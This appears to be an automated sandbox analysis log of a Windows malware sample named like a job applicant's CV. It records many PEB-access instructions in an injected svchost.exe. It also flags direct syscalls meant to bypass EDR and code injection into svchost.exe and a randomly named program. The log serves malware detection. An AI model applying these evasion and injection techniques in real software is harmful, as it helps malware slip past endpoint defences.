Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]	1_2_03C40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]	1_2_03CE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]	1_2_03CE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]	1_2_03CE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]	1_2_03CE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]	1_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]	1_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]	1_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]	1_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]	1_2_03CC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]	1_2_03CC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFAB40 mov eax, dword ptr fs:[00000030h]	1_2_03CFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD8B42 mov eax, dword ptr fs:[00000030h]	1_2_03CD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDEB50 mov eax, dword ptr fs:[00000030h]	1_2_03CDEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2CB7E mov eax, dword ptr fs:[00000030h]	1_2_03C2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D04B00 mov eax, dword ptr fs:[00000030h]	1_2_03D04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]	1_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]	1_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]	1_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]	1_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]	1_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]	1_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]	1_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C30AD0 mov eax, dword ptr fs:[00000030h]	1_2_03C30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]	1_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]	1_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]	1_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]	1_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D04A80 mov eax, dword ptr fs:[00000030h]	1_2_03D04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C68A90 mov edx, dword ptr fs:[00000030h]	1_2_03C68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]	1_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]	1_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C86AA4 mov eax, dword ptr fs:[00000030h]	1_2_03C86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]	1_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]	1_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]	1_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]	1_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]	1_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]	1_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]	1_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]	1_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]	1_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]	1_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]	1_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]	1_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDEA60 mov eax, dword ptr fs:[00000030h]	1_2_03CDEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]	1_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]	1_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBCA11 mov eax, dword ptr fs:[00000030h]	1_2_03CBCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6CA24 mov eax, dword ptr fs:[00000030h]	1_2_03C6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5EA2E mov eax, dword ptr fs:[00000030h]	1_2_03C5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]	1_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]	1_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC69C0 mov eax, dword ptr fs:[00000030h]	1_2_03CC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C649D0 mov eax, dword ptr fs:[00000030h]	1_2_03C649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]	1_2_03CFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]	1_2_03CBE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]	1_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]	1_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]	1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]	1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]	1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]	1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]	1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]	1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]	1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]	1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]	1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]	1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]	1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]	1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]	1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]	1_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]	1_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB89B3 mov esi, dword ptr fs:[00000030h]	1_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]	1_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]	1_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB0946 mov eax, dword ptr fs:[00000030h]	1_2_03CB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D04940 mov eax, dword ptr fs:[00000030h]	1_2_03D04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]	1_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]	1_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]	1_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]	1_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C7096E mov edx, dword ptr fs:[00000030h]	1_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]	1_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]	1_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]	1_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBC97C mov eax, dword ptr fs:[00000030h]	1_2_03CBC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]	1_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]	1_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBC912 mov eax, dword ptr fs:[00000030h]	1_2_03CBC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]	1_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]	1_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB892A mov eax, dword ptr fs:[00000030h]	1_2_03CB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC892B mov eax, dword ptr fs:[00000030h]	1_2_03CC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]	1_2_03C5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D008C0 mov eax, dword ptr fs:[00000030h]	1_2_03D008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]	1_2_03CFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]	1_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]	1_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C30887 mov eax, dword ptr fs:[00000030h]	1_2_03C30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBC89D mov eax, dword ptr fs:[00000030h]	1_2_03CBC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C42840 mov ecx, dword ptr fs:[00000030h]	1_2_03C42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C60854 mov eax, dword ptr fs:[00000030h]	1_2_03C60854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]	1_2_03C34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]	1_2_03C34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]	1_2_03CBE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]	1_2_03CBE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC6870 mov eax, dword ptr fs:[00000030h]	1_2_03CC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC6870 mov eax, dword ptr fs:[00000030h]	1_2_03CC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBC810 mov eax, dword ptr fs:[00000030h]	1_2_03CBC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C52835 mov eax, dword ptr fs:[00000030h]	1_2_03C52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C52835 mov eax, dword ptr fs:[00000030h]	1_2_03C52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C52835 mov eax, dword ptr fs:[00000030h]	1_2_03C52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C52835 mov ecx, dword ptr fs:[00000030h]	1_2_03C52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C52835 mov eax, dword ptr fs:[00000030h]	1_2_03C52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C52835 mov eax, dword ptr fs:[00000030h]	1_2_03C52835

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_0032A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_0032A66C

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_003181AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_003181AC
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00318189 SetUnhandledExceptionFilter,		0_2_00318189

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe protection: execute and read and write	Jump to behavior
